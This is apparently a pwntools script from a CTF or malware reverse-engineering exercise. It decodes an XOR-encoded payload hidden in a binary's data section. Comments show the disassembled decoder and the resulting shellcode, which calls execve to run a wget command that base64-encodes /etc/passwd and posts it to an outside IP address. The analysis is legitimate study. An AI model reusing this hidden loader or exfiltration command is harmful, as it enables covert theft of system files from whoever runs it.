|
from pwn import * # https://pwntools.com to install |
|
|
|
e = ELF('notes_19cd983d58eef2e5c7881ae8407e76d6') |
|
|
|
### Decoder loop, which is never referenced |
|
""" |
|
.data:0804C0A0 ; --------------------------------------------------------------------------- |
|
.data:0804C0A0 mov eax, 2 |
|
.data:0804C0A5 int 80h ; LINUX - sys_fork |
|
.data:0804C0A7 test eax, eax |
|
.data:0804C0A9 jz short loc_804C0B2 |
|
.data:0804C0AB mov eax, 41414141h |
|
.data:0804C0B0 jmp eax |
|
.data:0804C0B2 ; --------------------------------------------------------------------------- |
|
.data:0804C0B2 |
|
.data:0804C0B2 loc_804C0B2: ; CODE XREF: .data:0804C0A9j |
|
.data:0804C0B2 cld |
|
.data:0804C0B3 mov ebx, 5363FD0h ; xor key |
|
.data:0804C0B8 jmp short call_decode_loop |
|
.data:0804C0BA |
|
.data:0804C0BA ; =============== S U B R O U T I N E ======================================= |
|
.data:0804C0BA |
|
.data:0804C0BA |
|
.data:0804C0BA decode_loop proc near ; CODE XREF: .data:call_decode_loopp |
|
.data:0804C0BA pop esi |
|
.data:0804C0BB push esi |
|
.data:0804C0BC |
|
.data:0804C0BC loop: ; CODE XREF: decode_loop+9j |
|
.data:0804C0BC xor [esi], ebx |
|
.data:0804C0BE lodsd |
|
.data:0804C0BF add ebx, eax |
|
.data:0804C0C1 test eax, eax |
|
.data:0804C0C3 jnz short loop |
|
.data:0804C0C5 retn |
|
.data:0804C0C5 decode_loop endp |
|
.data:0804C0C5 |
|
.data:0804C0C6 ; --------------------------------------------------------------------------- |
|
.data:0804C0C6 |
|
.data:0804C0C6 call_decode_loop: ; CODE XREF: .data:0804C0B8j |
|
.data:0804C0C6 call decode_loop |
|
.data:0804C0C6 ; --------------------------------------------------------------------------- |
|
.data:0804C0CB dd 9C6E34BAh |
|
""" |
|
decoder = 0x0804C0A0 |
|
encoded = 0x0804C0CB |
|
ebx = 0x5363FD0 |
|
data = [] |
|
|
|
while True: |
|
dword = unpack(e.read(encoded, 4)) |
|
dword ^= ebx |
|
data.append(dword) |
|
|
|
eax = dword |
|
ebx = (ebx + eax) & 0xffffffff |
|
|
|
if dword == 0: |
|
break |
|
|
|
encoded += 4 |
|
|
|
payload = ''.join(map(pack, data)) |
|
print hexdump(payload) |
|
write('payload', payload) |
|
|
|
### The dumped payload looks something like |
|
""" |
|
seg000:00000000 seg000 segment byte public 'CODE' use32 |
|
seg000:00000000 assume cs:seg000 |
|
seg000:00000000 assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing |
|
seg000:00000000 push 0Bh ; sys_execve |
|
seg000:00000002 pop eax |
|
seg000:00000003 cdq |
|
seg000:00000004 push edx |
|
seg000:00000005 push small 632Dh |
|
seg000:00000009 mov edi, esp |
|
seg000:0000000B push 'hs/' |
|
seg000:00000010 push 'nib/' |
|
seg000:00000015 mov ebx, esp |
|
seg000:00000017 push edx |
|
seg000:00000018 call loc_C4 |
|
seg000:00000018 ; --------------------------------------------------------------------------- |
|
seg000:0000001D aWgetHttp54_178 db 'wget http://54.178.137.178/9isnxkqmz.php --post-data "`cat /etc/p' |
|
seg000:0000001D db 'asswd | base64 | tr -d "\n"`" --header="Content-Type: text/plain"' |
|
seg000:0000001D db ' -O /dev/null >/dev/null 2>/dev/null',0 |
|
seg000:000000C4 ; --------------------------------------------------------------------------- |
|
seg000:000000C4 |
|
seg000:000000C4 loc_C4: ; CODE XREF: seg000:00000018p |
|
seg000:000000C4 push edi |
|
seg000:000000C5 push ebx |
|
seg000:000000C6 mov ecx, esp |
|
seg000:000000C8 int 80h ; LINUX - |
|
seg000:000000C8 ; --------------------------------------------------------------------------- |
|
""" |